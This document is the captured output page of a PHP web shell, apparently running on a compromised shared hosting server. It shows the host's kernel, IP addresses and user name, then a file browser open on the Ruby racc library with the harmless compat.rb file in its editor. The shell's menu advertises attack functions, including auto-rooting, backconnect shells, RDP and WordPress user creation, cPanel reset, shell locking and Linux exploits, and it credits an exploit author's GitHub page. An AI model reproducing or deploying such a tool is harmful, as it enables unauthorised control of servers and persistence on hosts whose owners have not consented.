Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby32 /
share /
ruby /
racc /
[ HOME SHELL ]
Name
Size
Permission
Action
compat.rb
538
B
-rw-r--r--
debugflags.rb
1.29
KB
-rw-r--r--
exception.rb
272
B
-rw-r--r--
grammar.rb
22.18
KB
-rw-r--r--
grammarfileparser.rb
14.81
KB
-rw-r--r--
info.rb
297
B
-rw-r--r--
iset.rb
1.24
KB
-rw-r--r--
logfilegenerator.rb
5.04
KB
-rw-r--r--
parser-text.rb
18
KB
-rw-r--r--
parser.rb
17.93
KB
-rw-r--r--
parserfilegenerator.rb
10.58
KB
-rw-r--r--
sourcetext.rb
539
B
-rw-r--r--
state.rb
19.81
KB
-rw-r--r--
statetransitiontable.rb
7.83
KB
-rw-r--r--
static.rb
137
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compat.rb
#-- # # # # Copyright (c) 1999-2006 Minero Aoki # # This program is free software. # You can distribute/modify this program under the same terms of ruby. # see the file "COPYING". # #++ unless Object.method_defined?(:__send) class Object alias __send __send__ end end unless Object.method_defined?(:__send!) class Object alias __send! __send__ end end unless Array.method_defined?(:map!) class Array if Array.method_defined?(:collect!) alias map! collect! else alias map! filter end end end
Close